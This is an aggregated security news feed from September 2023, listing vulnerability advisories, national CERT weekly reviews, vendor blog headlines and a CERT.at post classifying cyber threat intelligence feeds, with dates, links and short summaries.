Accusoft ImageGear dcm_pixel_data_decode out-of-bounds write vulnerability
2023-09-25T00:00:00Z | 1695600000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1802
Accusoft ImageGear allocate_buffer_for_jpeg_decoding out-of-bounds write vulnerability
2023-09-25T00:00:00Z | 1695600000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1836
Accusoft ImageGear pictwread heap-based buffer overflow vulnerability
2023-09-25T00:00:00Z | 1695600000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1760
Accusoft ImageGear CreateDIBfromPict out-of-bounds write vulnerability
2023-09-25T00:00:00Z | 1695600000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1729
Google Chrome VideoEncoder av1_svc_check_reset_layer_rc_flag use-after-free vulnerability
2023-09-25T00:00:00Z | 1695600000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1751
Accusoft ImageGear tif_processing_dng_channel_count stack-based buffer overflow vulnerability
2023-09-25T00:00:00Z | 1695600000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1742
3 Lessons We've Learned from Successful Cyberattacks
2023-09-22T13:00:00Z | 1695387600

https://www.akamai.com/blog/security/2023/sep/3-lessons-learned-from-successful-cyberattacks
The National Cyber Security Centre Finland’s weekly review – 38/2023
2023-09-22T07:24:44Z | 1695367484

This week we talk about hactivism and denial-of-service attacks as information influence activities. We also provide information about the upcoming results webinar of the Ketjutonttu campaign.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-382023
The National Cyber Security Centre Finland’s weekly review – 38/2023
2023-09-22T07:24:44Z | 1695367484

This week we talk about hactivism and denial-of-service attacks as information influence activities. We also provide information about the upcoming results webinar of the Ketjutonttu campaign.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-382023
High Threat Security Alert (A23-09-17): Multiple Vulnerabilities in Apple iOS and iPadOS
2023-09-22T04:00:00Z | 1695355200

Apple has released iOS 16.7, iOS 17.0.1, iPadOS 16.7 and iPadOS 17.0.1 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-09-18): Vulnerability in Drupal
2023-09-22T04:00:00Z | 1695355200

Drupal has released a security advisory to address a vulnerability in the Drupal products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-09-19): Multiple Vulnerabilities in QNAP Products
2023-09-22T04:00:00Z | 1695355200

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
Unmasking a Sophisticated Phishing Campaign That Targets Hotel Guests
2023-09-21T14:00:00Z | 1695304800

https://www.akamai.com/blog/security-research/2023/sep/sophisticated-phishing-campaign-targeting-hospitality
Introducing Easy API Security Deployment
2023-09-21T13:00:00Z | 1695301200

https://www.akamai.com/blog/security/2023/sep/introducing-easy-api-security-deployment
The Cato Journey – Bringing SASE Transformation to the Largest Enterprises
2023-09-21T08:45:47Z | 1695285947

One of the observations I sometimes get from analysts, investors, and prospects is that Cato is a mid-market company. They imply that we are creating solutions that are simple and affordable, but don’t necessarily meet stringent requirements in scalability, availability, and functionality.   Here is the bottom line: Cato is an enterprise software company. Our mission... The post The Cato Journey – Bringing SASE Transformation to the Largest Enterprises   appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-cato-journey-bringing-sase-transformation-to-the-largest-enterprises/
Don’t overextend your Oblivious Transfer
2023-09-20T12:00:53Z | 1695211253

We found a vulnerability in a threshold signature scheme that allows an attacker to recover the signing key of threshold ECDSA implementations that are based on Oblivious Transfer (OT). A malicious participant of the threshold signing protocols could perform selective abort attacks during the OT extension subprotocol, recover the secret […]

https://blog.trailofbits.com/2023/09/20/dont-overextend-your-oblivious-transfer/
Akamai Prolexic Now Offers Cloud, On-Prem, and Hybrid DDoS Protection
2023-09-20T09:30:00Z | 1695202200

https://www.akamai.com/blog/security/akamai-prolexic-introduces-prolexic-on-prem-and-prolexic-hybrid
High Threat Security Alert (A23-09-14): Multiple Vulnerabilities in Juniper Networks Junos OS
2023-09-20T04:00:00Z | 1695182400

Juniper Networks has published a security advisory to address multiple vulnerabilities in Junos OS on Juniper EX Series and SRX Series.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A23-09-15): Vulnerability in Trend Micro Products
2023-09-20T04:00:00Z | 1695182400

Trend Micro has published a security advisory to address the vulnerability in Apex One and Worry-Free Business Security.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-09-16): Vulnerability in Apache Struts
2023-09-20T04:00:00Z | 1695182400

The Apache Software Foundation has released the security bulletins to address the vulnerability in Apache Struts.

https://www.govcert.gov.hk/en/alerts_detail.php
Solving Modern Azure Migration Challenges: iboss’ Azure Cloud Security Gateways
2023-09-19T15:58:35Z | 1695139115

The post Solving Modern Azure Migration Challenges: iboss’ Azure Cloud Security Gateways appeared first on iboss.

https://www.iboss.com/blog/iboss-azure-cloud-security-gateways/
How Account Opening Abuse Affects 6 Industries
2023-09-19T13:00:00Z | 1695128400

https://www.akamai.com/blog/security/how-account-opening-abuse-affects-6-industries
Cato: The Rise of the Next-Generation Networking and Security Platform
2023-09-19T12:00:00Z | 1695124800

Today, we announced our largest funding round to date ($238M) at a new company valuation of over $3B. It’s a remarkable achievement that is indicative not only of Cato’s success but also of a broader change in enterprise infrastructure.   We live in an era of digital transformation. Every business wants to be as agile, scalable,... The post Cato: The Rise of the Next-Generation Networking and Security Platform appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-the-rise-of-the-next-generation-networking-and-security-platform/
The National Cyber Security Centre Finland’s weekly review – 37/2023
2023-09-19T11:17:47Z | 1695122267

This week we cover an active scam call campaign, of which we have received numerous reports from both individual citizens and organisations. We also take a look at ransomware and the HYÖKY service for the municipal sector.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kyberturvallisuuskeskuksen-viikkokatsaus-372023
The National Cyber Security Centre Finland’s weekly review – 37/2023
2023-09-19T11:17:47Z | 1695122267

This week we cover an active scam call campaign, of which we have received numerous reports from both individual citizens and organisations. We also take a look at ransomware and the HYÖKY service for the municipal sector.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kyberturvallisuuskeskuksen-viikkokatsaus-372023
Welcome to GreyNoise Labs!
2023-09-19T00:00:00Z | 1695081600

GreyNoise is excited to officially announce the emergence of GreyNoise Labs and Labs API. Check out this post to learn more.

https://www.greynoise.io/blog/welcome-to-greynoise-labs
Unpacking what's packed: DotRunPeX analysis
2023-09-18T12:37:00Z | 1695040620

When, what and why As a national CERT we analyse all kinds of incidents. Some of them involve widespread APT campaigns, othertimes we just focus on everyday threats. Recently we got notified about a new malspam campaign targeting Polish users and decided to investigate. It all started with this phishing …

https://cert.pl/en/posts/2023/09/unpacking-whats-packed-dotrunpex/
Security flaws in an SSO plugin for Caddy
2023-09-18T12:00:42Z | 1695038442

We identified 10 security vulnerabilities within the caddy-security plugin for the Caddy web server that could enable a variety of high-severity attacks in web applications, including client-side code execution, OAuth replay attacks, and unauthorized access to resources. During our evaluation, Caddy was deployed as a reverse proxy […]

https://blog.trailofbits.com/2023/09/18/security-flaws-in-an-sso-plugin-for-caddy/
High Threat Security Alert (A23-09-12): Multiple Vulnerabilities in Microsoft Edge
2023-09-18T04:00:00Z | 1695009600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-09-13): Multiple Vulnerabilities in Google Chrome
2023-09-18T04:00:00Z | 1695009600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Akamai?s Perspective on September?s Patch Tuesday 2023
2023-09-15T14:00:00Z | 1694786400

https://www.akamai.com/blog/security-research/akamai-perspective-patch-tuesday-september-2023
How to request the deletion of your personal data from taxi service Yango
2023-09-15T09:29:06Z | 1694770146

Have you used the taxi service Yango and would like Yango to delete all of your personal data from their servers? Did you know that you can directly request Yango to delete your personal data on the basis of the EU’s General Data Protection Regulation (GDPR)?

https://www.kyberturvallisuuskeskus.fi/en/news/how-request-deletion-your-personal-data-taxi-service-yango
How to request the deletion of your personal data from taxi service Yango
2023-09-15T09:29:06Z | 1694770146

Have you used the taxi service Yango and would like Yango to delete all of your personal data from their servers? Did you know that you can directly request Yango to delete your personal data on the basis of the EU’s General Data Protection Regulation (GDPR)?

https://www.kyberturvallisuuskeskus.fi/en/news/how-request-deletion-your-personal-data-taxi-service-yango
The National Cyber Security Centre Finland’s weekly review – 36/2023
2023-09-15T08:59:31Z | 1694768371

This week, Traficom was targeted in a denial-of-service attack campaign, which caused a short interruption in service. We also talk about scam messages impersonating the Finnish postal service Posti.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-362023
The National Cyber Security Centre Finland’s weekly review – 36/2023
2023-09-15T08:59:31Z | 1694768371

This week, Traficom was targeted in a denial-of-service attack campaign, which caused a short interruption in service. We also talk about scam messages impersonating the Finnish postal service Posti.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-362023
RIA juhid osalesid kõrgetasemelisel DGX-i kohtumisel Singapuris
2023-09-15T08:56:34Z | 1694768194

RIA peadirektor Margus Noormaa ja tema asetäitja Joonas Heiter esindasid Eestit 4.–6. septembrini Singapuris toimunud digivaldkonna tippkohtumisel.

https://ria.ee/uudised/dgx
PCI DSS v4: Uncovering Web Skimming Threats with Payment Integrations
2023-09-14T13:00:00Z | 1694696400

https://www.akamai.com/blog/security/pci-dss-v4-uncovering-web-skimming-threats-with-payment-integrations
Security Alert (A23-09-11): Vulnerability in Fortinet Products
2023-09-14T04:00:00Z | 1694664000

Fortinet released a security advisory to address a vulnerability in Fortinet products.

https://www.govcert.gov.hk/en/alerts_detail.php
G2 Recognizes Flashpoint as High-Performing ‘Leader’ in Enterprise Threat Intelligence
2023-09-13T21:03:39Z | 1694639019

Flashpoint has earned multiple trust badges from G2's Fall 2023 Reports, affirming our unwavering commitment to delivering timely, contextual intelligence to our clients. The post G2 Recognizes Flashpoint as High-Performing ‘Leader’ in Enterprise Threat Intelligence appeared first on Flashpoint.

https://flashpoint.io/blog/g2-2023-fall-reports-flashpoint-threat-intelligence-leader/
Can't Be Contained: Finding a Command Injection Vulnerability in Kubernetes
2023-09-13T14:00:00Z | 1694613600

https://www.akamai.com/blog/security-research/kubernetes-critical-vulnerability-command-injection
The Numbers Behind the Numbers – Cost of a Data Breach
2023-09-13T09:23:35Z | 1694597015

The post The Numbers Behind the Numbers – Cost of a Data Breach appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-the-cost-of-a-data-breach
NIST Cybersecurity & Privacy Program
2023-09-13T07:39:34Z | 1694590774

Introduction  The National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) 1.1 has been a critical reference to help reduce or mitigate cybersecurity threats to Critical Infrastructures. First launched in 2014, it remains the de facto framework to address the cyber threats we have seen. However, with an eye toward addressing more targeted, sophisticated,... The post NIST Cybersecurity & Privacy Program appeared first on Cato Networks.

https://www.catonetworks.com/blog/nist-cybersecurity-privacy-program/
High Threat Security Alert (A23-09-08): Multiple Vulnerabilities in Microsoft Products (September 2023)
2023-09-13T04:00:00Z | 1694577600

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A23-09-09): Vulnerability in Adobe Reader/Acrobat
2023-09-13T04:00:00Z | 1694577600

Security updates are released for Adobe Reader and Acrobat to address a vulnerability.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A23-09-10): Vulnerability in Firefox
2023-09-13T04:00:00Z | 1694577600

Mozilla has published the advisory (MFSA2023-40) to address a vulnerability in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
MSSPs' Playbook for Success: Balancing Automation and Human Expertise
2023-09-13T00:00:00Z | 1694563200

This post recaps our recent webinar "How MSSPs Can Leverage Automation to Reduce Alerts & Maximize their Analysts." Check it out to see key takeaways related to their automation journey.

https://www.greynoise.io/blog/mssps-playbook-for-success-balancing-automation-and-human-expertise
Cisco Secure Application now delivers business risk observability for cloud environments
2023-09-12T12:00:00Z | 1694520000

Get clear visibility of each new vulnerability and the insights to prioritize remediation based on business impact. Cisco Secure Application now delivers business risk observability for #cloud environments.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m09/r-cisco-secure-application-now-delivers-business-risk-observability-for-cloud-environments.html
The European Cyber Shield
2023-09-12T09:18:45Z | 1694510325

The EU has been pushing the concept of the "European Cyber Shield" within the Digital Europe Programme as well as with the proposed "Cyber Solidarity Act". After a presentation on this topic at the CSIRTs Network meeting in June, I've written a long-form paper to lay out my thinking on this topic. Executive Summary The proposed Cyber Shield (Chapter 2 Cyber Solidarity Act) contains valid ideas: supporting SOCs by fostering national and cross-border collaboration is worth doing. An unfortunate choice of terminology is prone to confuse readers of the Act. A change would be welcomed. The relationship between the proposed structures and the tasks of the CSIRTs and the CSIRTs network (as stipulated in the NIS2 Directive) is not entirely clear. Defining this relationship and integrating the proposed roles with the existing structures would be useful. EU funding for multiple consortia with the aim of building closer, technical collaborations in cross-border structures is a sound investment. The full paper is available here or from our Download/Papers page.

https://www.cert.at/en/blog/2023/9/european-cyber-shield
High Threat Security Alert (A23-09-07): Vulnerability in Google Chrome
2023-09-12T04:00:00Z | 1694491200

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2023-4039: GCC’s -fstack-protector fails to guard dynamic stack allocations on ARM64
2023-09-12T00:00:00Z | 1694476800

https://rtx.meta.security/mitigation/2023/09/12/CVE-2023-4039.html
Choose Your Own Adventure ? A Chat About the Future of Edge Computing
2023-09-11T13:00:00Z | 1694437200

https://www.akamai.com/blog/edge/choose-your-own-adventure-the-future-of-edge-computing
Holy Macroni! A recipe for progressive language enhancement
2023-09-11T12:00:12Z | 1694433612

Despite its use for refactoring and static analysis tooling, Clang has a massive shortcoming: the Clang AST does not provide provenance information about which CPP macro expansions a given AST node is expanded from; nor does it lower macro expansions down to LLVM Intermediate Representation (IR) code. This makes the construction of […]

https://blog.trailofbits.com/2023/09/11/holy-macroni-a-recipe-for-progressive-language-enhancement/
Security: the key enabler for a strong cloud strategy
2023-09-11T12:00:00Z | 1694433600

The cloud is secure, but that’s no excuse for complacence.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m09/security-the-key-enabler-for-a-strong-cloud-strategy.html
How to Solve the Cloud vs On-Premise Security Dilemma
2023-09-11T08:54:57Z | 1694422497

Introduction Organizations need to protect themselves from the risks of running their business over the internet and processing sensitive data in the cloud. The growth of SaaS applications, Shadow IT and work from anywhere have therefore driven a rapid adoption of cloud-delivered cybersecurity services. Gartner defined SSE as a collection of cloud-delivered security functions: SWG,... The post How to Solve the Cloud vs On-Premise Security Dilemma appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-solve-the-cloud-vs-on-premise-security-dilemma/
High Threat Security Alert (A23-09-05): Multiple Vulnerabilities in Apple iOS and iPadOS
2023-09-11T04:00:00Z | 1694404800

Apple has released iOS 15.7.9, iOS 16.6.1, iPadOS 15.7.9 and iPadOS 16.6.1 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-09-06): Multiple Vulnerabilities in Microsoft Edge
2023-09-11T04:00:00Z | 1694404800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Sandboxing ImageIO media parsing in macOS
2023-09-11T00:00:00Z | 1694390400

https://rtx.meta.security/mitigation/2023/09/11/Sandboxing-ImageIO-in-macOS.html
Empowering K12 Education: iboss’s Unwavering Commitment to Safeguarding Schools Against Modern Cyber Threats
2023-09-08T18:17:02Z | 1694197022

The post Empowering K12 Education: iboss’s Unwavering Commitment to Safeguarding Schools Against Modern Cyber Threats appeared first on iboss.

https://www.iboss.com/blog/empowering-k12-education-ibosss-unwavering-commitment/
Akamai Prevents the Largest DDoS Attack on a U.S. Financial Company
2023-09-08T13:00:00Z | 1694178000

https://www.akamai.com/blog/security/akamai-prevents-the-largest-ddos-attack-on-a-us-financial-company
Increase Performance, Decrease Costs with a Flexible Distributed Cloud
2023-09-08T13:00:00Z | 1694178000

https://www.akamai.com/blog/cloud/increase-performance-decrease-costs-flexible-distributed-cloud
Augustikuu küberruumis: teenusekatkestused ja ummistusrünnete kasv
2023-09-08T09:14:11Z | 1694164451

RIA kuuülevaatest selgub, et mitmes olulises Eesti veebiteenuses esines augustis katkestusi ning kuu teisel poolel algas suurem ummistusrünnete laine, mille käigus võeti sihikule nii riigiasutuste kui ka eraettevõtete veebilehti.

https://ria.ee/uudised/augustikuu-kuberruumis-teenusekatkestused-ja-ummistusrunnete-kasv
CVE-2023-41741
2023-09-07T17:13:00Z | 1694106780

An exposure of sensitive information to an unauthorized actor vulnerability in cgi component in Synology Router Manager (SRM) before 1.3.1-9346-6 allows remote attackers to obtain sensitive information via unspecified vectors. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Synology RT6600ax routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the info.cgi file. The issue results from the exposure of sensitive data to the WAN interface. An attacker can leverage this vulnerability to disclose certain information in the context of the current process.

https://claroty.com/team82/disclosure-dashboard/cve-2023-41741
CVE-2023-41740
2023-09-07T17:11:00Z | 1694106660

An improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in cgi component in Synology Router Manager (SRM) before 1.3.1-9346-6 allows remote attackers to read specific files via unspecified vectors. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Synology RT6600ax routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the uistrings.cgi file. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose information in the context of the current process.

https://claroty.com/team82/disclosure-dashboard/cve-2023-41740
CVE-2023-41739
2023-09-07T17:10:00Z | 1694106600

An uncontrolled resource consumption vulnerability in File Functionality in Synology Router Manager (SRM) before 1.3.1-9346-6 allows remote authenticated users to conduct denial-of-service attacks via unspecified vectors. This vulnerability allows network-adjacent attackers to create a denial-of-service condition on affected installations of Synology RT6600ax routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the SYNO.Core file. The issue results from uncontrolled resource consumption. An attacker can leverage this vulnerability to create a denial-of-service condition on the device.

https://claroty.com/team82/disclosure-dashboard/cve-2023-41739
CVE-2023-41738
2023-09-07T17:10:00Z | 1694106600

An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability in Directory Domain Functionality in Synology Router Manager (SRM) before 1.3.1-9346-6 allows remote authenticated users to execute arbitrary commands via unspecified vectors. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology RT6600ax routers. Authentication is required to exploit this vulnerability. The specific flaw exists within the WEB API endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.

https://claroty.com/team82/disclosure-dashboard/cve-2023-41738
Best Practices for Testing Akamai App & API Protector
2023-09-07T13:00:00Z | 1694091600

https://www.akamai.com/blog/edge/testing-akamai-app-and-api-protector
Corsa Security Teams Up with Eventus Security to Deliver Managed Virtual Firewall Services
2023-09-07T13:00:00Z | 1694091600

Rapid deployment and dynamic scaling of software firewalls delivers advanced network security to Eventus’ customers Corsa Security, leaders in scaling network security, today announced it has entered into an agreement with Eventus Security, the Mumbai-based India’s leading Managed Security Services Provider, to offer a hosted, managed virtual firewall service for their customers. Eventus will be able […] The post Corsa Security Teams Up with Eventus Security to Deliver Managed Virtual Firewall Services appeared first on Corsa Security.

https://www.corsa.com/2023/09/07/corsa-security-teams-up-with-eventus-security-to-deliver-managed-virtual-firewall-services/
RIA hoiatab veebilehtede näotustamise eest
2023-09-07T07:40:35Z | 1694072435

Riigi Infosüsteemi Amet (RIA) avaldas täna ohuhinnangu, milles juhitakse tähelepanu jätkuvatele teenustõkestusrünnetele ja suurenenud veebilehtede näotustamise ohule.

https://ria.ee/uudised/ria-hoiatab-veebilehtede-naotustamise-eest
Security Alert (A23-09-04): Multiple Vulnerabilities in Cisco Products
2023-09-07T04:00:00Z | 1694059200

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
A classification of CTI Data feeds
2023-09-06T16:21:48Z | 1694017308

We at CERT.at process and share a wide selection of cyber threat intelligence (CTI) as part of our core mission as Austria’s hub for IT security information. Right now, we are involved in two projects that involve the purchase of commercial CTI. I encountered some varying views on what CTI is and what one should do with the indicators of compromise (IoCs) that are part of a CTI feed. This blog post describes my view on this topic. Context The EU decided in March 2022 to create a cybersecurity emergency response fund with which ENISA can purchase support services for the NIS entities in the member states. Austria is also taking part in a project that stems from the DEP call DIGITAL-ECCC-2022-CYBER-03 in combination with a joint procurement with the ECCC. Layers of CTI One way to structure and classify CTI feeds is to look at the abstraction level at which they operate. As Wikipedia puts it:  Tactical: Typically used to help identify threat actors (TAs). Indicators of compromise (such as IP addresses, Internet domains or hashes) are used and the analysis of tactics, techniques and procedures (TTP) used by cybercriminals is beginning to be deepened. Insights generated at the tactical level will help security teams predict upcoming attacks and identify them at the earliest possible stages. Operational: This is the most technical level of threat intelligence. It shares hard and specific details about attacks, motivation, threat actor capabilities, and individual campaigns. Insights provided by threat intelligence experts at this level include the nature, intent, and timing of emerging threats. This type of information is more difficult to obtain and is most often collected through deep, obscure web forums that internal teams cannot access. Security and attack response teams are the ones that use this type of operational intelligence. Strategic: Usually tailored to non-technical audiences, intelligence on general risks associated with cyberthreats. The goal is to deliver, in the form of white papers and reports, a detailed analysis of current and projected future risks to the business, as well as the potential consequences of threats to help leaders prioritize their responses. With tactical CTI, there a reasonable chance that it can shared on a machine-to-machine basis with full semantic information that makes it possible to automate the processing for detection and prevention purposes. Many commercial security devices are sold with a subscription to the vendor’s own data-feeds. This ranges from simple anti-spam solutions, over filters for web proxies to rules for SIEMs. While it is possible to encode operational CTI in standardized data exchange formats like STIX2, it is much harder for automated systems to operationalize this information. For example, what automated technical reaction is possible to “threat actor X is now using compromised CPEs in the country of its targets for C2 communication”? Yes, one can store that kind of information in OpenCTI (or a similar Threat Intelligence Platform (TIP)) and map it to the ATT&CK framework. That can be valuable for the human expert to plan defenses or to react better during incidents, but it is not detailed enough for automated defense. With strategic CTI, we are on the human management layer. This is never designed for automated processing by machines. Types of IOCs Focusing on the technical layer, we find that there are a number of different types of information encoded in the data feeds. One way to look at this is the Diamond Model of intrusion analysis which is built around information on adversary, capability, infrastructure, and victim. While this is a very valuable model for intrusion analysis, it is too complex for a simple categorization of CTI feeds. I propose the following three basic types: Type 1: Attack Surface Information Many of the feeds from Shadowserver fall in this category. Shodan data can also be a good example. There is now a bunch of companies focusing on “cyber risk rating”, which all try to evaluate the internet-visible infrastructure of organizations. Examples: “On IP-address A.B.C.D, at time X, we detected a Microsoft Exchange server running a version that is vulnerable to CVE-202X-XXXX”. "The time-server at IP addres Y can be abused as ddos-reflector." "On IP address Z, there is an unprotected MongoDB reachable from the Internet." Notable points are: This is very specific information about a concrete system. Usually, it is very clear who is responsible for it. There is no information about an actual compromise of the listed system. The system might be untouched or there may already be a number of webshells deployed on it. There is no information about an attacker. This is sensitive (potentially even GDPR-relevant) information. This information is (almost) useless to anybody but the owners of the system. Well, except for threat actors - that is another reason why we consider this to be sensitive information. Thus, the coordinating CSIRT should pass this information on to the maintainers of this system and to nobody else. CERT.at is usually tagging these events with “vulnerable / vulnerable system” or “vulnerable / potentially unwanted accessible service”. Expected response from system owner:  Mitigate the threat by reconfiguring / patching / upgrading / removing the system or maybe even accept the risk (e.g. “yes, we really want to have telnet enabled on that server”). Verify that the system has not been breached yet. Type 2: Threat Actor IOCs This is the opposite: the information is solely about the threat actor and the resources this group is using, but there is no clear information on the targets. Typical information contained in these IOCs is: The domain-name of a command & control (C2) server of the TA An IP address of a C2 server Filename and/or hash of malware used by the TA Email subject, sender and sending IP address of a phishing mail Mutex names, registry-keys or similar artefacts of an infection URL-pattern of C2 connections Example: A RAT Remcos campaign was detected 2023-06-14 to use Mutex: Rmc-MQTCB0 URI: /json.gp Email-attachment: Shipment_order83736383_document_file9387339.7z MD5: 2832aa7272b0e578cd4eda5b9a1f1b12 Filename: Shipment_order837363.exe Notable points are: This is detailed information about a threat actor infrastructure, tools and procedures. There is often no information about targets of these attacks. Sometimes, some targeting information is known, like “This TA usually attacks high-tech companies”. This information is potentially useful for everybody who that actor might target. Unless one thinks that attacker IP-addresses deserve GDPR-protection, this data has no privacy implication. Thus, the coordinating CSIRT should pass this information on to all constituents who are capable of operationalizing such CTI. CERT.at is usually not sending this kind of information pro-actively to all constituents, instead we operate a MISP instance which holds these IOCs. Security automation on the side of the constituent is welcome to use the MISP APIs to fetch and process the IOCs. If the targeting of the TA is sufficiently well known and specific, CERT.at will pass on the IOCs directly to the constituent’s security team. In rare cases, the TA is abusing infrastructure of one of our constituents. In that case, we have a mix with the next type of CTI. Expected response from system owner: Add the IOCs to any sort of incident prevention system, e.g., filter lists in proxies, EDR or AV software. Add the IOCs to the incident detection system, e.g., create suitable rules in SIEMs. Ideally, also perform a search in old logs for the newly acquired IOCs. Type 3: Infection data Sometimes we receive cyber threat information that is very specific and concerns a live incident inside a constituent’s network. Examples are: “We detected at timestamp X a webshell placed on a Citrix server. IP-address = A.B.C.D, path = /logon/LogonPoint/uiareas/mac/vkb.php” “Our darknet monitoring detected that someone is selling VPN credentials for user@example.com on the platform X” “After a takedown of botnet X we are monitoring botnet drone connections to the former C2 servers. On [timestamp], the IP address A.B.C.D connected to our sinkhole.” “We managed to get access to the infrastructure of threat actor X. According to the data we found there, your constituent Y is compromised.” “Please find below information on IPs geolocated in your country which are most likely hosting a system infected by SystemBC malware. […] Timestamp, IP-address, hostname, c2 ip-address” “There are signs of malicious manipulations on the Website of domain X, there is a phishing page at /images/ino/95788910935578/login.php” Notable points are: This is usually very specific information about a live incident involving a concrete system. In the best case, the information is good enough to trigger a successful investigation and remediation. The threat actor is often, but not always, named. This is sensitive (potentially even GDPR-relevant) information. This information is (almost) useless to anybody but the owners of the system. This information can be very time-sensitive: a quick reaction can sometimes prevent a ransomware incident. Thus, the coordinating CSIRT should pass this information quickly on to the maintainers of this system and to nobody else. CERT.at is usually tagging these events with “intrusions / system-compromise” or “fraud / phishing” Expected response from system owner: Start the local incident response process. Clean up the known infection and investigate the possibility of additional compromises in the affected network (lateral movement?). Investigate how the system got comprimised and reconfigure / patch / upgrade / remove the system so that a re-infection via the same vulnerability is no longer possible. Tooling CERT.at is using IntelMQ to process feeds of type 1 and 3. CTI feeds of type 2 are handled by our MISP installation.

https://www.cert.at/en/blog/2023/9/cti-data-feeds
DGA Families with Dynamic Seeds: Unexpected Behavior in DNS Traffic
2023-09-06T14:00:00Z | 1694008800

https://www.akamai.com/blog/security-research/dga-dynamic-unexpected-behavior-in-dns
The National Cyber Security Centre Finland’s weekly review – 35/2023
2023-09-06T11:16:24Z | 1693998984

This week we remind our readers about the importance of responding quickly to information security incidents. For example, if you fall victim to a phishing attack, you may still be able to avoid suffering serious damage by taking quick action. We also talk about romance scams and warn about tax return scams.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-352023
The National Cyber Security Centre Finland’s weekly review – 35/2023
2023-09-06T11:16:24Z | 1693998984

This week we remind our readers about the importance of responding quickly to information security incidents. For example, if you fall victim to a phishing attack, you may still be able to avoid suffering serious damage by taking quick action. We also talk about romance scams and warn about tax return scams.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-352023
Security Alert (A23-09-02): Multiple Vulnerabilities in Android
2023-09-06T04:00:00Z | 1693972800

Google has released Android Security Bulletin September 2023 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-09-03): Multiple Vulnerabilities in Google Chrome
2023-09-06T04:00:00Z | 1693972800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Se trabalha em cibersegurança, responda ao inquérito da AP2SI
2023-09-06T00:00:00Z | 1693958400

A Associação Portuguesa para a Promoção da Segurança da Informação (AP2SI) lançou a terceira edição do seu inquérito bienal direcionado aos profissionais que atuam nas áreas da cibersegurança e segurança da informação em Portugal, com o apoio do Observatório de Cibersegurança do CNCS. Trata-se de um inquérito online, aberto e anónimo, que está disponível para respostas entre os dias 4 e 23 de setembro. Se é um profissional de cibersegurança e da segurança da informação a trabalhar em Portugal, convidamo-lo a responder ao questionário seguinte, ajudando à produção de um conhecimento mais completo sobre quem trabalha nesta área em Portugal. Para responder ao questionário, clique aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135794/se-trabalha-em-ciberseguranca-responda-ao-inquerito-da-ap2si
Fast-Tracking Innovation: GreyNoise Labs Experimental CLI
2023-09-06T00:00:00Z | 1693958400

GreyNoise Labs introduces their new greynoiselabs CLI tool to work with cutting edge, experimental APIs that expose planetary scale internet honeypot and scan data to help defenders stay one step ahead of adversaries.

https://www.greynoise.io/blog/fast-tracking-innovation-greynoise-labs-experimental-cli
3 Ways to Use Zero Trust to Reduce Cybercrime Risk in Healthcare
2023-09-05T13:00:00Z | 1693918800

https://www.akamai.com/blog/security/use-zero-trust-to-reduce-cybercrime-risk
CVE-2023-39227
2023-09-05T10:28:00Z | 1693909680

